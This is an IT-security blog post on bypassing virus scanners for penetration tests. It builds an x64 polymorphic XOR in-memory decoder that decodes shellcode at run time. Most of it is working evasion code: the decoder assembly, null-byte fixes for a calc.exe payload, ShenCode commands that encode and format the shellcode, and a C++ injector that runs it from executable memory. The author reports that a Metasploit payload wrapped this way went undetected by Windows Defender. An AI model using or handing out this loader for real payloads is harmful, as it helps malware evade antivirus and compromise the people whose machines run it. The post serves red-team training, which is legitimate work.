{{tag>IT-Security Windows Kali pentest obfuscation blog english}}
====== Obfuscation: polymorphic in-memory decoder ======
{{it-security:blog:2024-250_xor_in-memory_decoder.webp?400|}}
Red-teaming and penetration tests often require virus scanners to be bypassed in order to effectively detect security vulnerabilities. [[en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen|In the last part]] we looked at disguising shellcode as UUIDs in the source code. That worked well, but the shellcode was still recognised in memory and blocked.
We now want to solve this with a polymorphic in-memory decoder: shellcode that decodes shellcode.
===== XOR decoder =====
I have taken the XOR decoder from [[https://www.doyler.net/security-not-included/shellcode-xor-encoder-decoder|doyler.net]] and adapted it to the x64 architecture. This was quite simple, as only the corresponding registers had to be renamed. The decoder starts with this instruction:
_start:
jmp short call_decoder ; Begin of JMP-CALL-POP
''%%JMP-CALL-POP%%'' is a technique for obtaining the address of our data at run time, so the code works regardless of where it is loaded in memory. In this first step, we jump to the label ''%%call_decoder%%'':
call_decoder:
call decoder ; pushes the address of the next instruction (the shellcode) onto the stack
; The encoded shellcode
Shellcode: db 0x6a,0x77,0xb6...
Here the ''%%CALL%%'' instruction calls another part of the programme. In doing so, it pushes the address of the next instruction (in our case the encoded shellcode) onto the stack, and ''%%RSP%%'' now points to that saved address.
decoder:
pop rsi ; Move pointer to encoded shellcode into RSI from the stack
In the called part of the programme, we pop that address from the stack into the register ''%%RSI%%'' and now know where our shellcode is located in memory.
Now we move on to the actual decryption routine:
decode:
xor byte [rsi], 0x3F ; The byte RSI points to, will be XORed by 0x3F
jz Shellcode ; leave the loop if the result is 0: [RSI] xor 0x3F = 0
inc rsi ; increment RSI to decode the next byte
jmp short decode ; loop until each byte was decoded
''%%xor byte [rsi], 0x3F%%'' decodes the byte that ''%%RSI%%'' points to. On the first pass, this is the first byte of the shellcode. The key is ''%%0x3F%%'' and must match the key that was used for encoding.
''%%jz Shellcode%%'' then checks whether the decoded byte is ''%%0x00%%''.
==== $Byte \neq 0$ ====
If the decoded byte is not zero, the jump is not taken and execution continues with the next instruction: ''%%inc rsi%%''
''%%RSI%%'' is incremented and now points to the next byte of the shellcode, which is decoded on the next pass. ''%%jmp short decode%%'' jumps back to the start of the loop.
==== $Byte = 0$ ====
If the decoded byte is zero, the loop ends and the shellcode is executed. This is why the key itself has to be appended to the encoded shellcode:
''%%0x3F XOR 0x3F = 0x00%%''
The appended byte marks the end of the shellcode and terminates the loop, so we do not need an additional counter.
''%%jz Shellcode%%'' then jumps directly to our decoded shellcode and executes it.
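The loop is easier to follow when modelled outside of assembler. The following is only a minimal Python sketch of the same logic, not part of the decoder itself. The function name ''%%decode_in_place%%'' and the three placeholder bytes are assumptions made for illustration.

```python
def decode_in_place(buf: bytearray, key: int = 0x3F) -> int:
    """Model of the decode loop: XOR byte by byte until a result is 0.

    Returns the index of the terminator, i.e. the decoded length.
    """
    i = 0                    # plays the role of RSI
    while True:
        buf[i] ^= key        # xor byte [rsi], key
        if buf[i] == 0:      # jz Shellcode
            return i
        i += 1               # inc rsi, then jmp short decode


# Placeholder data (not real shellcode): "ABC" encoded with 0x3F,
# followed by the key itself as the terminator.
encoded = bytearray([0x41 ^ 0x3F, 0x42 ^ 0x3F, 0x43 ^ 0x3F, 0x3F])
length = decode_in_place(encoded)
print(length, bytes(encoded[:length]))
```

Without the trailing key byte, the Python model raises an ''%%IndexError%%''. The real decoder has no such bounds check and would simply keep XORing whatever follows in memory.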
===== calc.exe Payload =====
We want to execute the ''%%calc.exe%%'' payload from [[en:it-security:blog:shellcode_injection-4|this blog post]]. However, it still contains null bytes, which would break the decoding. Why is this the case? Here is an example:
# Encoding
XOR Key: 0x3F
Byte: 0x00
0x00 XOR 0x3F = 0x3F
# Decoding
XOR Key: 0x3F
Byte: 0x3F
0x3F XOR 0x3F = 0x00
A null byte in the original payload would thus abort the decoding process early, since ''%%jz Shellcode%%'' would treat it as the signal to terminate. We therefore need to make a few modifications.
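The effect can be reproduced with a few placeholder bytes. This is a hedged sketch in Python: the helper names ''%%xor_bytes%%'' and ''%%decoded_prefix%%'' are made up for this example, and the byte values are arbitrary, not taken from the payload.

```python
KEY = 0x3F


def xor_bytes(data: bytes, key: int = KEY) -> bytes:
    """XOR every byte with the key (encoding and decoding are the same operation)."""
    return bytes(b ^ key for b in data)


def decoded_prefix(encoded: bytes, key: int = KEY) -> bytes:
    """Return what the decode loop produces before it sees a zero result."""
    out = bytearray()
    for b in encoded:
        d = b ^ key
        if d == 0:           # the decoder treats this as the end marker
            break
        out.append(d)
    return bytes(out)


# Arbitrary placeholder bytes with a null byte at index 2.
raw = bytes([0x48, 0x31, 0x00, 0xC0, 0x90])
encoded = xor_bytes(raw) + bytes([KEY])   # key appended as terminator
prefix = decoded_prefix(encoded)
print(f"{len(prefix)} of {len(raw)} bytes decoded")
```

Only the two bytes in front of the null byte are decoded. Everything after it stays encoded and would be executed as garbage.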
==== GS Register ====
The fix for the GS register from the previous post only removes two of the three null bytes. This was sufficient for the previous tests. A small change brings us to our goal here:
xor rax, rax
mov al, 60h
mov rax, gs:[rax] ; 65 48 8b 00
change to:
xor rax, rax
mov rax, gs:[rax+0x60] ; 65 48 8b 40 60
This also reduces the size of our shellcode a little.
==== Kernel32-Base ====
When searching for ''%%Kernel32Base%%'' we dereference the register ''%%RAX%%'' directly, without a displacement. ''%%mov rax, [rax]%%'' is encoded with a ModRM byte of ''%%0x00%%'', which again results in a null byte. If we go through the register ''%%RBX%%'' instead, we avoid the null bytes:
mov rax, [rax] ; 48 8b 00
mov rax, [rax] ; 48 8b 00
change to:
mov rbx, [rax] ; 48 8b 18
mov rax, [rbx] ; 48 8b 03
==== JMP SHORT ====
jmp short InvokeWinExec ; eb 00
This jump targets the very next instruction, so its displacement is ''%%0x00%%''. As execution falls through to the same place without the ''%%JMP%%'', we can comment out the line.
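The encodings quoted in the three subsections above can also be checked mechanically. The following Python sketch only uses the opcode bytes shown in the comments of the listings. The helper ''%%null_offsets%%'' is a hypothetical name, not a ShenCode function.

```python
def null_offsets(code: bytes) -> list[int]:
    """Return the positions of all 0x00 bytes in an instruction encoding."""
    return [i for i, b in enumerate(code) if b == 0]


# Instruction text -> encoding, copied from the listings above.
variants = {
    "mov rax, gs:[rax]":       bytes.fromhex("65488b00"),
    "mov rax, gs:[rax+0x60]":  bytes.fromhex("65488b4060"),
    "mov rax, [rax]":          bytes.fromhex("488b00"),
    "mov rbx, [rax]":          bytes.fromhex("488b18"),
    "mov rax, [rbx]":          bytes.fromhex("488b03"),
    "jmp short InvokeWinExec": bytes.fromhex("eb00"),
}

for text, code in variants.items():
    print(f"{text:<26} {code.hex(' '):<16} null bytes at {null_offsets(code)}")
```

The same check can be run over the whole extracted payload before encoding. An empty list means the decoder will not stop early.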
==== Compile ====
We can now assemble the code and get opcodes without null bytes.
nasm -f win64 calc.asm -o calc.o
===== XOR decoder stub =====
==== Prepare calc.exe payload ====
We now need to process the opcodes a little before we can use them in the decoder. I use my shellcode tool [[https://github.com/psycore8/shencode|ShenCode]] for this:
python shencode.py extract -i calc.o -o calc.raw -fb 60 -lb 311
...
python shencode.py xorencode -i calc.raw -o calc.xor -k 63
...
python shencode.py formatout -i calc.xor -s cs
[*] processing shellcode format...
0x6a,0x77,0xb6,
...
0x07,0x77,0xbc,0xfb,0x27,0x77,0xbc,0xfb,0x37,0x62
[+] DONE!
Step by step:
- We extract the actual shellcode from the file ''%%calc.o%%'' (offset ''%%60%%'' to ''%%311%%'') and save it in ''%%calc.raw%%''
- We encode the extracted code with the key ''%%63%%'' and save the result in ''%%calc.xor%%''. Decimal ''%%63%%'' corresponds to ''%%3F%%'' in hexadecimal
- We output the encoded shellcode in C# format (which we can also use in assembler)
We save the output, remove the line breaks and append our "magic byte" ''%%0x3F%%'' at the end.
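The encoding and formatting steps above amount to very little logic. As a rough illustration, here is a Python sketch of them. It is not ShenCode's implementation, and ''%%prepare%%'' is a hypothetical helper. The three input bytes are simply the first three encoded bytes from the output above (''%%0x6a,0x77,0xb6%%'') XORed back with ''%%0x3F%%''.

```python
def prepare(raw: bytes, key: int = 0x3F) -> str:
    """XOR-encode raw bytes, append the key as terminator, format as a db list."""
    if 0 in raw:
        # A null byte encodes to the key and would end the decode loop early.
        raise ValueError("raw payload contains a null byte")
    encoded = bytes(b ^ key for b in raw) + bytes([key])
    return ",".join(f"0x{b:02x}" for b in encoded)


# 0x55 ^ 0x3F = 0x6a, 0x48 ^ 0x3F = 0x77, 0x89 ^ 0x3F = 0xb6
line = prepare(bytes([0x55, 0x48, 0x89]))
print("Shellcode: db " + line)
```

Rejecting null bytes at this point catches the problem described earlier before the stub is assembled.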
==== XOR decoder and payload ====
Now we can add our payload to the XOR decoder. To do this, we paste the previously prepared bytes into the ''%%db%%'' directive at the end of the XOR decoder:
; The encoded shellcode
Shellcode: db 0x6a,0x77,0xb6,...0x37,0x62,0x3f
We also check whether the XOR key matches:
decode:
xor byte [rsi], 0x3F
If everything is correct, we compile our decoder:
nasm -f win64 xor-decoder.asm -o xor-decoder.o
We then search for the shellcode offsets, extract our code and prepare it for our ''%%Inject.cpp%%'' file:
python shencode.py formatout -i xor-decoder.o -s inspect
0x00000048: 00 00 00 00 00 00 00 00
0x00000056: 20 00 50 60 eb 0b 5e 80 Offset=60
0x00000064: 36 3f 74 0a 48 ff c6 eb
...
0x00000320: bc fb 27 77 bc fb 37 62
0x00000328: 3f 2e 66 69 6c 65 00 00 Offset=329
0x00000336: 00 00 00 00 00 fe ff 00
python shencode.py extract -i xor-decoder.o -o xor-decoder.stub -fb 60 -lb 329
[*] try to open file
[+] reading xor-decoder.o successful!
[*] cutting shellcode from 60 to 329
[+] written shellcode to xor-decoder.stub
[+] DONE!
python shencode.py formatout -i xor-decoder.stub -s c
[*] processing shellcode format...
"\xeb\x0b\x5e...\x37\x62\x3f"";
[+] DONE!
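Extracting by offset is just a byte slice. The sketch below assumes the end offset is exclusive. The output above is at least consistent with that, since offset 328 holds the ''%%0x3f%%'' terminator and the extracted stub ends in ''%%\x3f%%''. The function ''%%carve%%'' and the synthetic buffer are assumptions for illustration only and do not reproduce a real object file.

```python
def carve(blob: bytes, first: int, last: int) -> bytes:
    """Return blob[first:last]; 'last' is treated as exclusive (an assumption)."""
    if not 0 <= first <= last <= len(blob):
        raise ValueError("offsets outside of the file")
    return blob[first:last]


# Synthetic stand-in for an object file: 60 header bytes, a short body
# ending in the 0x3F terminator, then the start of a symbol string.
body = bytes([0xEB, 0x0B, 0x5E, 0x37, 0x62, 0x3F])
blob = bytes(60) + body + b".file\x00"

stub = carve(blob, 60, 60 + len(body))
print(stub.hex(" "))
```

A quick sanity check after extraction is that the last byte equals the XOR key. If it does not, the offsets are off by at least one.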
===== Inject.cpp =====
We can now insert the bytes we have just prepared into our injector programme and compile it.
#include <windows.h>
#include <iostream>
#include <cstring>
#pragma warning
unsigned char payload[] =
"\xeb\x0b\x5e...\x37\x62\x3f";
int main() {
size_t byteArrayLength = sizeof(payload);
std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl;
void* (*memcpyPtr) (void*, const void*, size_t);
void* exec = VirtualAlloc(0, byteArrayLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpyPtr = &memcpy;
memcpyPtr(exec, payload, byteArrayLength);
((void(*)())exec)();
return 0;
}
===== Debug =====
For testing purposes, I started a debugger and navigated to the memory area of the XOR decoder. While stepping through the code, you can see how the bytes in the lower area are decoded one by one. In the images, this is the area below the ''%%call%%'' instruction, which corresponds to ''%%Shellcode: db ...%%''.
{{it-security:blog:2024-250_xor_in-memory_decoder.png?600|}}
{{it-security:blog:2024-250_xor_in-memory_decoder_1.png?600|}}
{{it-security:blog:2024-250_xor_in-memory_decoder_2.png?600|}}
{{it-security:blog:2024-250-animation.gif|}}
The animation above shows the decoding loop, while the shellcode in the lower area is decoded step by step.
===== Test with a Metasploit payload =====
The whole thing also works with a Metasploit payload:
{{it-security:blog:2024-250_xor_in-memory_decoder_3.png?700|}}
===== Conclusion =====
To simplify the process, I have integrated the XOR stub as a template in [[https://github.com/psycore8/shencode|ShenCode]]. With two commands, we generate an XOR in-memory decoder:
python shencode.py xorencode -i input.raw -o xor.out --key 63
python shencode.py xorpoly -i xor.out -o stub.raw --key 63
The XOR decoder keeps the payload encoded in memory until the stub decodes it at run time. In combination with other obfuscation techniques, this can be a useful aid in penetration tests. In my test, even the Metasploit payload was not detected by Windows Defender.
~~DISCUSSION~~